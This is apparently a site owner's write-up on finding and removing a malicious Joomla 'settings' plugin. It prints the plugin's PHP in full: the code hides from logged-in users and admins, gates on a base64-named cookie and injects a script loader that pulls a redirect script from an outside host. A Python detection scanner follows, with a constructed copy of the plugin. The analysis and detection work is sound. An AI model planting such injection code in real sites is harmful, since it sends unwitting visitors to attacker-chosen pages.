I found this webpage useful to start with: https://www.getastra.com/blog/911/joomla-malicious-redirects/
My next step was to see if I could get the source code for the redirect that was happening. I used https://www.view-page-source.com/ to fetch the source code anonymously, hoping it would trigger, and it did!
The malware injected the following into the head:
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://[URL-REMOVED]";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
I then searched the whole Joomla PHP source code for "khutmhpx" and found a Joomla plugin called "settings", located at "plugins/system/settings/settings.php", which had been installed and activated. Looking at the initialisation of this plugin, its only purpose was the following:
<?php
/**
 * @Enterprise: Joomla! Project
 * @author: Joomla! Project
 * @url: http://www.github.com
 * @license: GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
 * @copyright: github.com
 *
 * Custom settings plugin;
 * https://github.com
 * License: MIT License
 */
defined('_JEXEC') or die;

class plgSystemSettings extends JPlugin
{
    // Runs on every request, before the page is rendered.
    public function onAfterInitialise()
    {
        $user      = JFactory::getUser();
        $mainframe = JFactory::getApplication();

        if ( $user -> id > 0 ) {
            // user route: logged-in visitors never see the payload
        } else {
            // non-user route
            $current_url = JUri::getInstance();

            if (stristr($current_url, "/admin")) {
                // admin-panel route: nothing is injected on the backend
            } else {
                // base64_decode('cl9vaw==') is the cookie name "r_ok"
                if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
                    // Cookie "r_ok" = 1, valid for 86400 s (one day), path base64_decode('Lw==') = "/"
                    setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );

                    // Inject the loader that pulls the redirect script from the remote URL
                    echo '<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://[URL-REMOVED]";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
';
                }
            }
        }
    }
}
To summarise what this code is doing:
IF:
- The visitor is not logged in.
- The visitor is not visiting /admin (the backend).
- The cookie (named "r_ok", stored in the code as base64 'cl9vaw==') is not present.
THEN:
- Set that cookie for path "/", expiring in 1 day, so each visitor only gets the payload once.
- Inject JavaScript into the head of the page, which loads a script from another URL.
The script loaded from that other URL contains the redirect code to a destination of the attacker's choosing.
To fix, I zipped/backed up the settings directory and then deleted it.
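The search described above (grepping the tree for one identifier) only finds this particular plugin. The traits that would have found it without knowing the name are the obfuscation and gating tricks it uses: string literals passed to base64_decode(), a cookie set from a decoded name, execution gated on that cookie being absent, and PHP that echoes a <script> which appends another script to <head>. Below is an added Python triage script, not code from the original post, that scans a Joomla tree for exactly those traits and decodes the base64 literals so the cookie name is readable. The plugin sample it scans is a constructed copy of the plugin's logic with a placeholder URL ("https://PLACEHOLDER-REMOVED.invalid/x.js"), and the clean plugin beside it is also constructed; the directory layout is written to a temporary folder so the script runs offline.

```python
import base64
import binascii
import os
import re
import tempfile
from typing import Dict, List

# Indicators drawn from the injected plugin: a base64 literal fed to base64_decode(),
# a cookie set from a decoded name, a check that the cookie is absent, and an echoed
# <script> that creates and appends a second script element.
BASE64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
SETCOOKIE_B64 = re.compile(r"setcookie\(\s*base64_decode")
COOKIE_GATE = re.compile(r"isset\(\s*\$_COOKIE\[")
ECHO_SCRIPT = re.compile(r"echo\s+['\"]<script", re.IGNORECASE)
INJECTED_SCRIPT = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")


def decode_literal(b64: str) -> str:
    """Decode a base64 literal to printable ASCII; return '' if it is not one."""
    try:
        raw = base64.b64decode(b64, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return ""
    return text if text.isprintable() else ""


def scan_source(text: str) -> List[str]:
    """Return a human-readable finding for each indicator present in one PHP source."""
    findings: List[str] = []
    seen = set()
    for m in BASE64_CALL.finditer(text):
        literal = m.group(1)
        if literal in seen:
            continue
        seen.add(literal)
        findings.append(f"base64_decode literal {literal!r} -> {decode_literal(literal)!r}")
    if SETCOOKIE_B64.search(text):
        findings.append("setcookie() with a base64-obfuscated cookie name")
    if COOKIE_GATE.search(text):
        findings.append("payload gated on a cookie being absent (fires once per visitor)")
    if ECHO_SCRIPT.search(text) and INJECTED_SCRIPT.search(text):
        findings.append("PHP echoes a <script> that appends another script element to <head>")
    return findings


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a Joomla tree and report every .php file that has at least one indicator."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_source(fh.read())
            if findings:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


# Constructed samples: a copy of the malicious plugin's logic (placeholder URL) and a clean one.
SAMPLES = {
    "plugins/system/settings/settings.php": r'''<?php
defined('_JEXEC') or die;
class plgSystemSettings extends JPlugin
{
    public function onAfterInitialise()
    {
        $user = JFactory::getUser();
        if ($user->id > 0) {
        } else {
            $current_url = JUri::getInstance();
            if (stristr($current_url, "/admin")) {
            } else {
                if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
                    setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
                    echo '<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://PLACEHOLDER-REMOVED.invalid/x.js";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
';
                }
            }
        }
    }
}
''',
    "plugins/system/clean/clean.php": r'''<?php
defined('_JEXEC') or die;
class plgSystemClean extends JPlugin
{
    public function onAfterInitialise()
    {
        // base64_decode on a non-literal is not flagged: only hard-coded literals are.
        $key = base64_decode($this->params->get('key'));
    }
}
''',
}


def demo() -> Dict[str, List[str]]:
    """Write the constructed samples to a temp directory, scan it and return the report."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path)
        for f in findings:
            print("  -", f)
```

Point scan_tree() at the Joomla root to check a real install; anything it reports deserves a manual read, but a single decoded literal in a well-known extension is low signal, while the combination of a decoded cookie name, a cookie-absence gate and an echoed script loader is the pattern above. Deleting the plugin directory, as done here, removes the code but leaves its row in Joomla's #__extensions table, so it is worth also removing it through the Extensions manager (or the table) so the site does not keep trying to load a plugin that no longer exists.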